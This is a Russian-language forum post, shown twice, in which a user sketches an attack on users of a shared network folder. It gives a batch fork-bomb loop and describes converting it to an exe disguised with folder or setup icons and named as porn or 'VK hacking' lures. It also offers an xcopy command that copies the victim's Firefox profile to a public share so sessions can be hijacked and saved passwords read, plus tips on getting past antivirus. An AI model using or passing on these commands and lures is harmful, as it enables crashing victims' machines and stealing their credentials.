Battle Forum - Показать сообщение отдельно

zloy_kaktus · 27.01.2012, 13:15

Справится ли антивирус с такой задачей...
логическая бамбой вот такой например

:battlefox
start cmd
goto battlefox

Если запихать в BAT и просто запустить... не думаю что какой то антивирус заблокирует это.., а ведь это приведет к зависанию компа
А если теперь bat перекомпилировать в exe (таких программ миллион, можно набрать в поисковике “bat to exe”) поменять иконку на иконку папку или на иконку setup (такие программы тоже есть)
Теперь идем на \\swap.sampo.ru\swap\incoming
кидаем .exe файл с иконкой папки называем «порно»
Или кидаем exe файл с иконкой sutup называем «взлом контакта»
А если вместо логической бомбы поставить туда например xcopy %APPDATA% \Mozilla \\swap.sampo.ru\swap\incoming (если даже пароли не сохранены то авторизированный сеансf сольется например авторизация на battle и можно будет продолжить пользоваться сеансом если заменить скопированную папку Mozilla на свою, а если сохранены пароли то настройки - защита - показать пароли)
Это я так по быстрому не задумываясь пишу… а так можно все более не заметнее сделать… все карты никто не расскрывает
минусы
У жертвы может быть включен режим когда видно окончание .exe (с этим можно справится)
Параноидальный режим антивируса может спросить запускать ли exe (с этим можно справится)
Сетевой сканер может не разрешить копирование… но раз пользователь уже знает о \\swap.sampo.ru\swap\incoming то скорее всего доверенная зона

27.01.2012, 13:15	#29
zloy_kaktus Firefox User	Справится ли антивирус с такой задачей... логическая бамбой вот такой например :battlefox start cmd goto battlefox Если запихать в BAT и просто запустить... не думаю что какой то антивирус заблокирует это.., а ведь это приведет к зависанию компа А если теперь bat перекомпилировать в exe (таких программ миллион, можно набрать в поисковике “bat to exe”) поменять иконку на иконку папку или на иконку setup (такие программы тоже есть) Теперь идем на \\swap.sampo.ru\swap\incoming кидаем .exe файл с иконкой папки называем «порно» Или кидаем exe файл с иконкой sutup называем «взлом контакта» А если вместо логической бомбы поставить туда например xcopy %APPDATA% \Mozilla \\swap.sampo.ru\swap\incoming (если даже пароли не сохранены то авторизированный сеансf сольется например авторизация на battle и можно будет продолжить пользоваться сеансом если заменить скопированную папку Mozilla на свою, а если сохранены пароли то настройки - защита - показать пароли) Это я так по быстрому не задумываясь пишу… а так можно все более не заметнее сделать… все карты никто не расскрывает минусы У жертвы может быть включен режим когда видно окончание .exe (с этим можно справится) Параноидальный режим антивируса может спросить запускать ли exe (с этим можно справится) Сетевой сканер может не разрешить копирование… но раз пользователь уже знает о \\swap.sampo.ru\swap\incoming то скорее всего доверенная зона Последний раз редактировалось zloy_kaktus; 27.01.2012 в 13:39.